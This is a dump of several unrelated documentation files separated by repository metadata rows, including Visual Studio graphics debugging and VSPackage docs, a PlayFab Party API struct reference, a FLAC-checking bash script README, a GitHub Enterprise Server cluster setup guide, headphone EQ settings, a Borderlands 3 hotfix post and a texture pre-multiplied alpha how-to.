> `PSSetShader` no aparecerá en la ventana **Lista de eventos gráficos** si no se estableció durante este fotograma. Normalmente esto solo sucede si se usa un sombreador de píxeles para todos los objetos o si la llamada `PSSetShader` se omitió involuntariamente durante este fotograma. En cualquier caso, se recomienda buscar el código fuente de la aplicación para las llamadas `PSSetShader` y usar técnicas de depuración tradicionales para examinar el comportamiento de estas llamadas.
2. Abra la ventana **Pila de llamadas de eventos gráficos** . En la barra de herramientas **Diagnóstico de gráficos** , elija **Pila de llamadas de eventos de gráficos**.
3. Use la pila de llamadas para buscar la llamada `PSSetShader` en el código fuente de la aplicación. En la ventana **Pila de llamadas de eventos gráficos** , elija la llamada que se encuentra más arriba y examine el valor en el que se establece el sombreador de píxeles. El sombreador de píxeles se puede establecer directamente en NULL o el valor NULL se podría producir debido a un argumento que se pasó a la función o a otro estado. Si no se establece directamente, podría encontrar el origen del valor NULL en algún lugar de la parte superior de la pila de llamadas. En este escenario, descubrirá que el sombreador de píxeles se establece directamente en `nullptr` en la función que se encuentra más arriba, que se denomina `CubeRenderer::Render`:

> [!NOTE]
> Si no encuentra el origen del valor NULL al examinar la pila de llamadas, se recomienda que establezca un punto de interrupción condicional en la llamada `PSSetShader` , de manera que esa ejecución del programa se interrumpa cuando el sombreador de píxeles se establezca en NULL. Después, reinicie la aplicación en el modo de depuración y use técnicas de depuración tradicionales para encontrar el origen del valor NULL.
Para solucionar el problema, asigne el sombreador de píxeles correcto mediante el primer parámetro de la llamada de API `ID3D11DeviceContext::PSSetShader` .

Después de corregir el código, puede volver a compilarlo y ejecutar la aplicación de nuevo para comprobar que se resuelve el problema de representación:

| 124.962963 | 900 | 0.781269 | spa_Latn | 0.995002 |
9a6111fc7df00b3f4d038a574d8bee16a8a9006b | 2,109 | md | Markdown | docs/vs-2015/misc/vspackages-and-the-managed-package-framework.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-09-01T20:45:52.000Z | 2020-09-01T20:45:52.000Z | docs/vs-2015/misc/vspackages-and-the-managed-package-framework.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/misc/vspackages-and-the-managed-package-framework.md | klmnden/visualstudio-docs.tr-tr | 82aa1370dab4ae413f5f924dad3e392ecbad0d02 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: VSPackages ve yönetilen paket çerçevesini | Microsoft Docs
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: devlang-csharp
ms.topic: conceptual
helpviewer_keywords:
- managed package framework
- VSPackages, managed package framework
- managed VSPackages, managed package framework
ms.assetid: e8d80e0f-6b5b-4baf-a7df-59fd808c60cd
caps.latest.revision: 16
manager: jillfra
ms.openlocfilehash: 5b72b2c3bd6b03d1d3f3e50135c2ddf4758a4bd9
ms.sourcegitcommit: 08fc78516f1107b83f46e2401888df4868bb1e40
ms.translationtype: MT
ms.contentlocale: tr-TR
ms.lasthandoff: 05/15/2019
ms.locfileid: "65683054"
---
# <a name="vspackages-and-the-managed-package-framework"></a>VSPackages ve yönetilen paket çerçevesini
VSPackage ile yönetilen paket framework (MPF) sınıfları yerine COM birlikte çalışma sınıflarını kullanarak oluşturarak geliştirme süresini azaltabilirsiniz.
Yönetilen bir VSPackage oluşturmanın iki yolu vardır:
- Kullanım [!INCLUDE[vsprvs](../includes/vsprvs-md.md)] paket proje şablonu
Daha fazla bilgi için [izlenecek yol: Visual Studio Paket şablonu kullanarak bir menü komutu oluşturmak](https://msdn.microsoft.com/library/1985fa7d-aad4-4866-b356-a125b6a246de).
- VSPackage olmadan derleme [!INCLUDE[vsprvs](../includes/vsprvs-md.md)] paket proje şablonu
Örneğin, bir örnek VSPackage'ı kopyalayın ve GUID'leri ve adlarını değiştirebilirsiniz. VSX bölümünde örnekleri bulabilirsiniz [kod Galerisi](http://code.msdn.microsoft.com/vsx/).
## <a name="in-this-section"></a>Bu Bölümde
[Yönetilen paket Framework sınıfları](../misc/managed-package-framework-classes.md)
Açıklar ve DLL dosyaları ve MPF sınıf ad alanları listeler.
## <a name="related-sections"></a>İlgili Bölümler
[İzlenecek yol: Visual Studio Paket şablonu kullanarak bir menü komutu oluşturma](https://msdn.microsoft.com/library/1985fa7d-aad4-4866-b356-a125b6a246de)
Yönetilen bir VSPackage'ı nasıl oluşturulacağını açıklar.
[Yönetilen VSPackage'ları](../misc/managed-vspackages.md)
Yönetilen kod için geçerli olan VSPackages yönlerini ortaya çıkarır. | 49.046512 | 186 | 0.789 | tur_Latn | 0.987815 |
9a61314b1fe0c227d68f1a3bd2915c5ed7958467 | 1,970 | md | Markdown | playfab-docs/features/multiplayer/networking/reference/structs/partydestroychatcontrolcompletedstatechange.md | v-dekennedy/playfab-docs | ed3efddba69ba4c11d6beb6072b22aae9b3a7d15 | [
"CC-BY-4.0",
"MIT"
] | 49 | 2019-03-22T15:56:44.000Z | 2022-03-30T17:30:20.000Z | playfab-docs/features/multiplayer/networking/reference/structs/partydestroychatcontrolcompletedstatechange.md | v-dekennedy/playfab-docs | ed3efddba69ba4c11d6beb6072b22aae9b3a7d15 | [
"CC-BY-4.0",
"MIT"
] | 195 | 2019-03-16T22:09:01.000Z | 2022-03-30T12:48:33.000Z | playfab-docs/features/multiplayer/networking/reference/structs/partydestroychatcontrolcompletedstatechange.md | v-dekennedy/playfab-docs | ed3efddba69ba4c11d6beb6072b22aae9b3a7d15 | [
"CC-BY-4.0",
"MIT"
] | 88 | 2019-03-06T06:32:31.000Z | 2022-03-28T08:39:45.000Z | ---
author: jdeweyMSFT
title: "PartyDestroyChatControlCompletedStateChange"
description: "Information specific to the *DestroyChatControlCompleted* type of state change."
ms.author: jdewey
ms.topic: reference
ms.prod: playfab
ms.date: 09/26/2019
---
# PartyDestroyChatControlCompletedStateChange
Information specific to the *DestroyChatControlCompleted* type of state change.
## Syntax
```cpp
typedef struct PartyDestroyChatControlCompletedStateChange {
PartyStateChangeResult result;
PartyError errorDetail;
PartyLocalDevice* localDevice;
PartyLocalChatControl* localChatControl;
void* asyncIdentifier;
} PartyDestroyChatControlCompletedStateChange
```
### Members
**`result`** [PartyStateChangeResult](../enums/partystatechangeresult.md)
Indicates that the chat control destruction operation Succeeded or provides the reason that it failed.
**`errorDetail`** PartyError
A diagnostic value providing additional troubleshooting information regarding any potential error condition.
The human-readable form of this error detail can be retrieved via [PartyManager::GetErrorMessage()](../classes/PartyManager/methods/partymanager_geterrormessage.md).
**`localDevice`** [PartyLocalDevice](../classes/PartyLocalDevice/partylocaldevice.md)*
The local device used in the call associated with this state change.
**`localChatControl`** [PartyLocalChatControl](../classes/PartyLocalChatControl/partylocalchatcontrol.md)*
The chat control that was destroyed.
The memory remains valid until this state change is returned.
**`asyncIdentifier`** void*
The async identifier provided to the call associated with this state change.
## Requirements
**Header:** Party.h
## See also
[Party members](../party_members.md)
[PartyLocalDevice::DestroyChatControl](../classes/PartyLocalDevice/methods/partylocaldevice_destroychatcontrol.md)
| 31.269841 | 165 | 0.767005 | eng_Latn | 0.714769 |
9a6293615a8ece840bf87a8b3d1e8594ec2c3fae | 275 | md | Markdown | _project/100-layer-cake-movie-inspired-wedding-ideas.md | rumnamanya/rumnamanya.github.io | 2deadeff04c8a48cf683b885b7fa6ab9acc1d9d9 | [
"MIT"
] | null | null | null | _project/100-layer-cake-movie-inspired-wedding-ideas.md | rumnamanya/rumnamanya.github.io | 2deadeff04c8a48cf683b885b7fa6ab9acc1d9d9 | [
"MIT"
] | null | null | null | _project/100-layer-cake-movie-inspired-wedding-ideas.md | rumnamanya/rumnamanya.github.io | 2deadeff04c8a48cf683b885b7fa6ab9acc1d9d9 | [
"MIT"
] | null | null | null | ---
layout: project_single
title: "100 Layer Cake — Movie-Inspired Wedding Ideas"
slug: "100-layer-cake-movie-inspired-wedding-ideas"
parent: "beautiful-wes-anderson-decor-ideas"
---
Dinner Menu (via This Beautiful Wes Anderson-Inspired Wedding Is One Of A Kind) #refinery29 | 39.285714 | 91 | 0.774545 | eng_Latn | 0.538919 |
9a62a5304d808ce941cc646737c53ef9def79308 | 4,461 | md | Markdown | README.md | cgomesu/bash-flac-diag | b5a06fa03367e30c9bea929c569912693709d1e3 | [
"MIT"
] | 2 | 2021-07-31T13:03:40.000Z | 2021-08-22T14:19:48.000Z | README.md | cgomesu/bash-flac-diag | b5a06fa03367e30c9bea929c569912693709d1e3 | [
"MIT"
] | null | null | null | README.md | cgomesu/bash-flac-diag | b5a06fa03367e30c9bea929c569912693709d1e3 | [
"MIT"
] | null | null | null | # bash-flac-diag
This is a simple bash script for Linux to test [FLAC audio files](https://en.wikipedia.org/wiki/FLAC) recursively and generate logs with good files (no errors found) and bad ones (at least one error found). The script tests flac files with the help of [flac cli encoder/decoder](https://xiph.org/flac/documentation_tools_flac.html), which detects errors in the stream and when
> the MD5 signature of the decoded audio does not match the stored MD5 signature, even when the bitstream is valid.
This tool is meant to be used to identify corrupted flac files that should be deleted from an audio library, for example. Here's a demo of it:
<p align="center">
<a href="https://youtu.be/tPYSjBmLUFs"><img src="img/demo-slow.gif"></a>
</p>
# Requisites
* [**flac cli**](https://xiph.org/flac/download.html). Most distributions have a flac package.
* **Standard Linux packages**. (If you're running a mainstream distro, you don't need to worry about installing any one of them.)
When running **`flac_diag.sh`**, the script will attempt to detect all necessary programs and if there's one missing, you'll see a message about it. Make sure that if they're installed, they're also in your user's `$PATH`.
# Installation
I've only tested this script with Debian and Ubuntu but it probably works just fine with any other standard Linux distro.
## Debian/Ubuntu
* Via git
```
sudo apt update
sudo apt install git -yy
cd /opt
sudo git clone https://github.com/cgomesu/bash-flac-diag.git
sudo chmod +x bash-flac-diag/ -R
cd bash-flac-diag/
./install.sh
```
* Via github cli
```
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-key C99B11DEB97541F0
sudo apt-add-repository https://cli.github.com/packages
sudo apt update
sudo apt install gh
cd /opt
sudo gh repo clone cgomesu/bash-flac-diag
sudo chmod +x bash-flac-diag/ -R
cd bash-flac-diag/
./install.sh
```
# Usage
To scan and test all flac files inside a music folder recursively, simply run the script adding the **`/full/path/to/music/folder/`** as argument, as follows:
`./flac_diag.sh /path/to/music/folder/`
or
`bash flac_diag.sh /path/to/music/folder/`
The script will create a `./log` subfolder with two log files, namely `bad_flacs.log` and `good_flacs.log`. The former has a list with the path of each .flac file that has produced at least a single error when running the `flac` utility in test mode, while the latter has a list with the path of each .flac file that has not produced any errors. A detailed description of all errors produced by each file are stored on `./log/errors/` for debugging.
*(Optional: If you wish to create a log file with the output of the `flac_diag.sh` script, you can simply redirect the output to a file of your preference. For example, to output to a file called `output-10-06-2020.log`, simply run `bash flac_diag.sh /path/to/music/folder/ > output-10-06-2020.log`.)*
In most cases, after testing all .flac files, you'd want to:
1. Double check a few files in `bad_flacs.log`, to make sure they are actually corrupted;
2. Make a backup of the current `bad_flacs.log` files;
3. Attempt to fix the files in `bad_flacs.log` by re-enconding them; then manually recheck the files or clean the `bad_flacs.log` and re-run the `flac_diag.sh` script;
4. Then if re-encoding doesn't work as expected, remove all files in `bad_flacs.log` from your music folder.
## Fixing bad flac files
To attemp to fix the bad .flac files, you can use a tool in the `./tools` subfolder called **`bad_flac_fixer.sh`**, which takes a `bad_flacs.log` as argument and overwrites every single file listed in there with a re-encoded version of it. To fix all files listed in `./log/bad_flacs.log`, run the following from the git root folder:
`./tools/bad_flac_fixer.sh log/bad_flacs.log` or `bash tools/bad_flac_fixer.sh log/bad_flacs.log`
**Make a backup of your `bad_flacs.log`**, delete/clean the old `./log/bad_flacs.log`, and re-run the `flac_diag.sh` script. If the errors persist, I suggest to remove the bad files.
## Removing bad flac files
To remove the bad .flac files, you can use a tool in the `./tools` subfolder called **`bad_flac_remover.sh`**, which takes a `bad_flacs.log` as argument and deletes every single file listed in there. To delete all files listed in `./log/bad_flacs.log`, run the following from the git root folder:
`./tools/bad_flac_remover.sh log/bad_flacs.log` or `bash tools/bad_flac_remover.sh log/bad_flacs.log`
| 52.482353 | 451 | 0.751177 | eng_Latn | 0.991572 |
9a62f404911c32b892087e8487fdba984693834f | 4,991 | md | Markdown | translations/pt-BR/content/admin/enterprise-management/initializing-the-cluster.md | lukmangrd/lukman- | 3c608c1e3e9c374f3260016d4a32fd453532cac0 | [
"CC-BY-4.0",
"MIT"
] | 9 | 2021-04-02T15:46:42.000Z | 2022-03-06T17:21:45.000Z | translations/pt-BR/content/admin/enterprise-management/initializing-the-cluster.md | lukmangrd/lukman- | 3c608c1e3e9c374f3260016d4a32fd453532cac0 | [
"CC-BY-4.0",
"MIT"
] | 52 | 2022-01-28T19:09:04.000Z | 2022-03-30T18:16:41.000Z | translations/pt-BR/content/admin/enterprise-management/initializing-the-cluster.md | erik-888/docs | 2e78dc37bc875b4df09986b152a56129ace3d62d | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-02-28T00:59:02.000Z | 2021-02-28T00:59:02.000Z | ---
title: Inicializar o cluster
intro: 'Um cluster do {% data variables.product.prodname_ghe_server %} deve ser configurado com uma licença e inicializado usando o shell administrativo (SSH).'
redirect_from:
- /enterprise/admin/clustering/initializing-the-cluster
- /enterprise/admin/enterprise-management/initializing-the-cluster
versions:
enterprise-server: '*'
---
{% data reusables.enterprise_clustering.clustering-requires-https %}
### Instalar o {% data variables.product.prodname_ghe_server %}
1. Em cada nó de cluster, provisione e instale o {% data variables.product.prodname_ghe_server %}. Para obter mais informações, consulte "[Configurar uma instância do {% data variables.product.prodname_ghe_server %}](/enterprise/{{ currentVersion }}/admin/guides/installation/setting-up-a-github-enterprise-server-instance)".
2. Usando o shell administrativo ou DHCP, configure **somente** o endereço IP de cada nó. Não altere outras configurações.
### Configurar o primeiro nó
1. Conecte-se ao nó que será designado como principal no MySQL no `cluster.conf`. Para obter mais informações, consulte "[Sobre o arquivo de configuração do cluster](/enterprise/{{ currentVersion }}/admin/guides/clustering/initializing-the-cluster/#about-the-cluster-configuration-file)".
2. No navegador, acesse `https://<ip address>:8443/setup/`.
{% data reusables.enterprise_installation.upload-a-license-file %}
{% data reusables.enterprise_installation.save-settings-in-web-based-mgmt-console %}
{% data reusables.enterprise_installation.instance-will-restart-automatically %}
### Inicializar o cluster
Para inicializar o cluster, você precisa de um arquivo de configuração de cluster (`cluster.conf`). Para obter mais informações, consulte “[Sobre o arquivo de configuração do cluster](/enterprise/{{ currentVersion }}/admin/guides/clustering/initializing-the-cluster/#about-the-cluster-configuration-file)".
1. Desde o primeiro nó configurado, execute `ghe-cluster-config-init`. Essa ação inicializará o cluster caso haja nós no arquivo de configuração que não estão configurados.
2. Execute `ghe-cluster-config-apply`. Fazer isso vai validar o arquivo `cluster.conf`, aplicar a configuração a cada arquivo de nó e ativar os serviços configurados em cada nó.
Para verificar o status de um cluster em execução, use o comando `ghe-cluster-status`.
### Sobre o arquivo de configuração do cluster
O arquivo de configuração do cluster (`cluster.conf`) define os nós no cluster e os serviços que cada nó executa. Para obter mais informações, consulte "[Sobre os nós do cluster](/enterprise/{{ currentVersion }}/admin/guides/clustering/about-cluster-nodes)."
O exemplo `cluster.conf` define um cluster com cinco nós.
- Dois nós (chamados `ghe-app-node-\*`) executam os serviços `web-server` e `job-server` responsáveis por responder às solicitações do cliente.
- Três nós (chamados `ghe-data-node-\*`) executam o serviço de armazenamento e recuperação de dados do {% data variables.product.prodname_ghe_server %}.
Os nomes dos nós podem ser qualquer nome de host válido. Cada nome é definido como nome de host e será adicionado a `/etc/hosts` em cada nó. Assim, os nós podem ser resolvidos localmente entre si.
Especifique o primeiro nó do cluster que você configurou como principal do MySQL via `mysql-server` e `mysql-master`.
```ini
[cluster]
mysql-master = ghe-data-node-1
redis-master = ghe-data-node-1
primary-datacenter = default
[cluster "ghe-app-node-1"]
hostname = ghe-app-node-1
ipv4 = 192.168.0.2
# ipv6 = fd12:3456:789a:1::2
web-server = true
job-server = true
[cluster "ghe-app-node-2"]
hostname = ghe-app-node-2
ipv4 = 192.168.0.3
# ipv6 = fd12:3456:789a:1::3
web-server = true
job-server = true
[cluster "ghe-data-node-1"]
hostname = ghe-data-node-1
ipv4 = 192.168.0.4
# ipv6 = fd12:3456:789a:1::4
consul-server = true
consul-datacenter = default
git-server = true
pages-server = true
mysql-server = true
elasticsearch-server = true
redis-server = true
memcache-server = true
metrics-server = true
storage-server = true
[cluster "ghe-data-node-2"]
hostname = ghe-data-node-2
ipv4 = 192.168.0.5
# ipv6 = fd12:3456:789a:1::5
consul-server = true
consul-datacenter = default
git-server = true
pages-server = true
mysql-server = true
elasticsearch-server = true
redis-server = true
memcache-server = true
metrics-server = true
storage-server = true
[cluster "ghe-data-node-3"]
hostname = ghe-data-node-3
ipv4 = 192.168.0.6
# ipv6 = fd12:3456:789a:1::6
consul-server = true
consul-datacenter = default
git-server = true
pages-server = true
mysql-server = true
elasticsearch-server = true
redis-server = true
memcache-server = true
metrics-server = true
storage-server = true
```
Crie o arquivo `/data/user/common/cluster.conf` no primeiro nó configurado. Por exemplo, usando `vim`:
```shell
ghe-data-node-1:~$ sudo vim /data/user/common/cluster.conf
```
| 43.4 | 325 | 0.745542 | por_Latn | 0.904594 |
9a63259cae3963267c0249f6a5e1ab1bcfcf1a5d | 1,377 | md | Markdown | README.md | akhlesh/angular-dropdown-element | 6bc10d1c6aa191875343c3ce32f5eb196a316a23 | [
"MIT"
] | null | null | null | README.md | akhlesh/angular-dropdown-element | 6bc10d1c6aa191875343c3ce32f5eb196a316a23 | [
"MIT"
] | 10 | 2019-05-03T16:53:21.000Z | 2022-03-02T03:54:13.000Z | README.md | akhlesh/angular-dropdown-element | 6bc10d1c6aa191875343c3ce32f5eb196a316a23 | [
"MIT"
] | null | null | null | # angular-dropdown-element
[AngularElement](https://angular.io/guide/elements) dropdown
## Demo
* Javascript - https://jsfiddle.net/Akhlesh/0jmdrzvh/
* React - https://jsfiddle.net/Akhlesh/fvswda9L/
## Installation
```bash
$ npm install angular-dropdown-element bootstrap
```
## Usage
```html
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Angular Dropdown Element</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css">
</head>
<body>
<div class="container">
<ng-dropdown-element label="name"></ng-dropdown-element>
</div>
<script src="node_modules/ng-dropdown-element/index.js"></script>
<script>
var items = Array.from({ length: 50 }, (e, i) => ({ name: 'test name ' + i }));
const el = document.querySelector('ng-dropdown-element');
el.items = items;
el.addEventListener('valueChange', (e) => console.log(e.detail));
</script>
</body>
</html>
```
## Dropdown input/outputs
| Input/Output | Description |
| --- | --- |
| items | array :-list of items |
| value | item:- dropdown value |
| label | string or function:- to get label value |
| placeholder | string :- placeholder value. Default: 'Please select an item' |
| valueChange | function:- gets called on value change. |
| itemRenderer| function:- function to get html template for an item|
| 25.5 | 102 | 0.673929 | yue_Hant | 0.241339 |
9a63ef8db5287e8db155ea8fa66b9db32d2f3034 | 1,543 | md | Markdown | results/crinacle/harman_in-ear_2019v2/Audeze iSINE 20/README.md | eliMakeouthill/AutoEq | b16c72495b3ce493293c6a4a4fdf45a81aec9ca0 | [
"MIT"
] | 3 | 2022-02-25T08:33:08.000Z | 2022-03-13T11:27:29.000Z | results/crinacle/harman_in-ear_2019v2/Audeze iSINE 20/README.md | billclintonwong/AutoEq | aa25ed8e8270c523893fadbda57e9811c65733f1 | [
"MIT"
] | null | null | null | results/crinacle/harman_in-ear_2019v2/Audeze iSINE 20/README.md | billclintonwong/AutoEq | aa25ed8e8270c523893fadbda57e9811c65733f1 | [
"MIT"
] | null | null | null | # Audeze iSINE 20
See [usage instructions](https://github.com/jaakkopasanen/AutoEq#usage) for more options and info.
### Parametric EQs
In case of using parametric equalizer, apply preamp of **-7.3dB** and build filters manually
with these parameters. The first 5 filters can be used independently.
When using independent subset of filters, apply preamp of **-7.2dB**.
| Type | Fc | Q | Gain |
|:--------|:---------|:-----|:--------|
| Peaking | 28 Hz | 0.46 | 5.0 dB |
| Peaking | 791 Hz | 0.31 | -5.3 dB |
| Peaking | 1508 Hz | 1.22 | -7.5 dB |
| Peaking | 2376 Hz | 1.14 | 11.5 dB |
| Peaking | 4975 Hz | 1.45 | 5.5 dB |
| Peaking | 479 Hz | 2.43 | 0.8 dB |
| Peaking | 831 Hz | 5.51 | -1.5 dB |
| Peaking | 6180 Hz | 7.09 | 1.7 dB |
| Peaking | 8671 Hz | 2.22 | -1.9 dB |
| Peaking | 17767 Hz | 0.31 | 1.0 dB |
### Fixed Band EQs
In case of using fixed band (also called graphic) equalizer, apply preamp of **-8.7dB**
(if available) and set gains manually with these parameters.
| Type | Fc | Q | Gain |
|:--------|:---------|:-----|:--------|
| Peaking | 31 Hz | 1.41 | 5.5 dB |
| Peaking | 62 Hz | 1.41 | 2.1 dB |
| Peaking | 125 Hz | 1.41 | -0.2 dB |
| Peaking | 250 Hz | 1.41 | -2.6 dB |
| Peaking | 500 Hz | 1.41 | -2.6 dB |
| Peaking | 1000 Hz | 1.41 | -8.9 dB |
| Peaking | 2000 Hz | 1.41 | 1.4 dB |
| Peaking | 4000 Hz | 1.41 | 8.3 dB |
| Peaking | 8000 Hz | 1.41 | 0.2 dB |
| Peaking | 16000 Hz | 1.41 | 1.1 dB |
### Graphs
 | 38.575 | 98 | 0.551523 | eng_Latn | 0.739338 |
9a64aaa75156b0845841606520a74f57091a99d6 | 114 | md | Markdown | README.md | VivekV95/ds-and-algos-java | d132f2ae877be4fa496d534cfad49335d6c16c40 | [
"MIT"
] | null | null | null | README.md | VivekV95/ds-and-algos-java | d132f2ae877be4fa496d534cfad49335d6c16c40 | [
"MIT"
] | null | null | null | README.md | VivekV95/ds-and-algos-java | d132f2ae877be4fa496d534cfad49335d6c16c40 | [
"MIT"
] | null | null | null | # ds-and-algos-java
Various Java implementations of algorithms for sorting and searching numerous data structures
| 38 | 93 | 0.842105 | eng_Latn | 0.967447 |
9a650ecddd7a5cc63d351d5f98c2bbd7f140539f | 140 | md | Markdown | content/page/solution/cards/card3/card3.md | threefoldfoundation/www_webstack_poc | 41007f0522487801d25f6d58e5145a1f8a6768b1 | [
"Apache-2.0"
] | 1 | 2020-11-23T19:23:03.000Z | 2020-11-23T19:23:03.000Z | content/page/solution/cards/card3/card3.md | threefoldfoundation/www_webstack_poc | 41007f0522487801d25f6d58e5145a1f8a6768b1 | [
"Apache-2.0"
] | 7 | 2020-11-28T14:10:00.000Z | 2020-12-28T10:02:10.000Z | content/page/solution/cards/card3/card3.md | threefoldfoundation/www_webstack_poc | 41007f0522487801d25f6d58e5145a1f8a6768b1 | [
"Apache-2.0"
] | null | null | null | ---
id: tokenCard3
title: A Sustainable Internet, for our planet
image: ./card3.jpeg
button: Start Now
link: '/blog'
order: 3
excerpt:
---
| 14 | 45 | 0.7 | eng_Latn | 0.544985 |
9a65bc08b19d93e6daec2e7d22720dc174b8195d | 1,684 | md | Markdown | gbx_info_archive/2021-05-20-true_trial_of_cunning.md | clayne/bl3hotfixes | 9bce5f069f4474671bc74a950172cc886dcb001d | [
"BSD-3-Clause"
] | 10 | 2019-10-06T23:58:30.000Z | 2021-09-01T16:43:02.000Z | gbx_info_archive/2021-05-20-true_trial_of_cunning.md | clayne/bl3hotfixes | 9bce5f069f4474671bc74a950172cc886dcb001d | [
"BSD-3-Clause"
] | null | null | null | gbx_info_archive/2021-05-20-true_trial_of_cunning.md | clayne/bl3hotfixes | 9bce5f069f4474671bc74a950172cc886dcb001d | [
"BSD-3-Clause"
] | 5 | 2019-10-19T07:45:27.000Z | 2021-03-25T20:30:55.000Z | Borderlands 3 Hotfixes: May 20, 2021
Original URL: https://borderlands.com/en-US/news/2021-05-20-borderlands-3-hotfixes-may-20/
Posted: May 20 2021
Today’s changes to Borderlands 3 activate the True Trials event for the Trial of Cunning. During this event, the Trial of Cunning boss has received a HUGE boost to its health and the damage it will be dishing out to players. This mini-event cannot be turned off, so new players beware!
Maurice’s Black Market Vending Machine will be moving to a new location on Thursdays at 9:00 AM PT / 12:00 PM ET and is activated with a hotfix. This week’s gear has a special appearance of a piece of gear from the second Borderlands 3 add-on. As a reminder, players are unable to equip DLC gear if they do not own the DLC it comes from.
These changes will be live on all platforms by 12:00 PM PT. To apply hotfixes, wait at the main menu until you see a sign that reads, “Hotfixes Applied!” If you are experiencing any issues or want to provide feedback, please submit a ticket to support.2k.com.
* Activating the True Trial of Cunning event, which will be active until May 27 at 8:59 AM PT
As a reward, the boss will be dropping two Legendary weapons. Each drop has a chance of being either Sickle or Skullmasher from Gun, Love, and Tentacles add-on (Note: Players who do not own the Guns, Love, and Tentacles add-on will not be able to equip Skullmasher until they own the respective add-on).
In addition, the chest at the end of the Trial of Cunning will be full of Legendaries regardless of how quickly you completed it or how many objectives you scored!
With this hotfix, the Trial of Survival will be returning to its regular state.
| 80.190476 | 337 | 0.780285 | eng_Latn | 0.999473 |
9a661400e7c0b4a758544d2c35575df214ed8e59 | 4,438 | md | Markdown | docs/designers/how-to-export-a-texture-that-has-premultiplied-alpha.md | MicrosoftDocs/visualstudio-docs.pl-pl | 64a8f785c904c0e158165f3e11d5b0c23a5e34c5 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-20T07:52:54.000Z | 2021-02-06T18:51:42.000Z | docs/designers/how-to-export-a-texture-that-has-premultiplied-alpha.md | MicrosoftDocs/visualstudio-docs.pl-pl | 64a8f785c904c0e158165f3e11d5b0c23a5e34c5 | [
"CC-BY-4.0",
"MIT"
] | 8 | 2018-08-02T15:03:13.000Z | 2020-09-27T20:22:01.000Z | docs/designers/how-to-export-a-texture-that-has-premultiplied-alpha.md | MicrosoftDocs/visualstudio-docs.pl-pl | 64a8f785c904c0e158165f3e11d5b0c23a5e34c5 | [
"CC-BY-4.0",
"MIT"
] | 16 | 2018-01-29T09:30:06.000Z | 2021-10-09T11:23:54.000Z | ---
title: 'Porady: eksportowanie tekstury wykorzystującej wstępnie przemnożony kanał alfa'
description: Dowiedz się, jak potok zawartości obrazu generuje wstępnie przemnożone tekstury alfa na podstawie obrazu źródłowego, który może być prostszy w użyciu i bardziej niezawodny.
ms.custom: SEO-VS-2020
ms.date: 11/04/2016
ms.topic: how-to
ms.assetid: 05348afa-f079-4f53-a05b-ecd91d13adab
author: TerryGLee
ms.author: tglee
manager: jmartens
ms.technology: vs-ide-designers
ms.workload:
- multiple
ms.openlocfilehash: 7f21aa94786fb9914bd72dfccfa9a59b8469d09f
ms.sourcegitcommit: 68897da7d74c31ae1ebf5d47c7b5ddc9b108265b
ms.translationtype: MT
ms.contentlocale: pl-PL
ms.lasthandoff: 08/13/2021
ms.locfileid: "122073646"
---
# <a name="how-to-export-a-texture-that-has-premultiplied-alpha"></a>Instrukcje: eksportowanie tekstury wykorzystującej wstępnie przemnożony kanał alfa
Potok zawartości obrazu może generować wstępnie przemnożone tekstury alfa na podstawie obrazu źródłowego. Mogą one być prostsze w użyciu i bardziej niezawodne niż tekstury, które nie zawierają wstępnie przemnożonego alfa.
W tym dokumencie okazano następujące działania:
- Konfigurowanie obrazu źródłowego do przetworzenia przez potok zawartości obrazu.
- Konfigurowanie potoku zawartości obrazu do generowania wstępnie przemnożonego alfa.
## <a name="premultiplied-alpha"></a>Wstępnie przemnożone znaki alfa
Wstępnie przemnożone znaki alfa mają kilka zalet w porównaniu z konwencjonalnymi, niespremulowanych alfa, ponieważ lepiej reprezentuje rzeczywistą interakcję światła z materiałami fizycznymi przez oddzielenie udziału koloru teksu (koloru, który dodaje do sceny) od jego przezroczystości (ilości koloru bazowego, przez który pozwala). Niektóre zalety korzystania ze wstępnie przemnożonego alfa są następujące:
- Łączenie z wstępnie przemnożonej alfa jest operacją asocjacyjną. Wynik mieszania wielu przezroczystych tekstur jest taki sam, niezależnie od kolejności mieszania tekstur.
- Ze względu na asocjacyjny charakter mieszania z wstępnie przemnożonego alfa, renderowanie obiektów translucentowych z wieloma przebiegami jest uproszczone.
- Używając wstępnie przemnożonej alfa, można równocześnie osiągnąć czyste mieszanie addytywne (przez ustawienie wartości alpha na zero) i interpolowane liniowo mieszania. Na przykład w układzie cząstkowym addytywnie zmieszana cząstka fire może stać się przezroczystą cząstką palną, która jest wmieszana przy użyciu interpolacji liniowej. Bez wstępnie przemnożonej alfa należy rysować cząstki pożaru niezależnie od cząstek palnych i modyfikować stan renderowania między wywołaniami rysowania.
- Tekstury, które używają wstępnie przemnożonego kompresa alfa o wyższej jakości niż te, które jej nie mają, i nie wykazują żadnych odbarwień krawędzi (lub "efektu obwódki"), które mogą być wynikiem w przypadku mieszania tekstur, które nie korzystają ze wstępnie przemnożonego alfa.
#### <a name="to-create-a-texture-that-uses-premultiplied-alpha"></a>Aby utworzyć teksturę, która używa wstępnie przemnożonego alfa
1. Zacznij od tekstury podstawowej. Załaduj istniejący plik obrazu lub utwórz go zgodnie z opisem w tece How to: Create a basic texture (Jak [utworzyć teksturę podstawową).](../designers/how-to-create-a-basic-texture.md)
2. Skonfiguruj plik tekstury tak, aby był przetwarzany przez potok zawartości obrazu. W **Eksplorator rozwiązań** otwórz menu skrótów dla pliku tekstury, a następnie wybierz pozycję **Właściwości**. Na stronie **Ogólne właściwości** konfiguracji ustaw właściwość Typ elementu na wartość Potok zawartości > **obrazu.** Upewnij się, że **właściwość Content** jest ustawiona na wartość **Tak,** a właściwość Wyklucz z kompilacji jest ustawiona na wartość **Nie,** a następnie wybierz **przycisk** Zastosuj. Zostanie **wyświetlona strona właściwości konfiguracji** potoku zawartości obrazu.
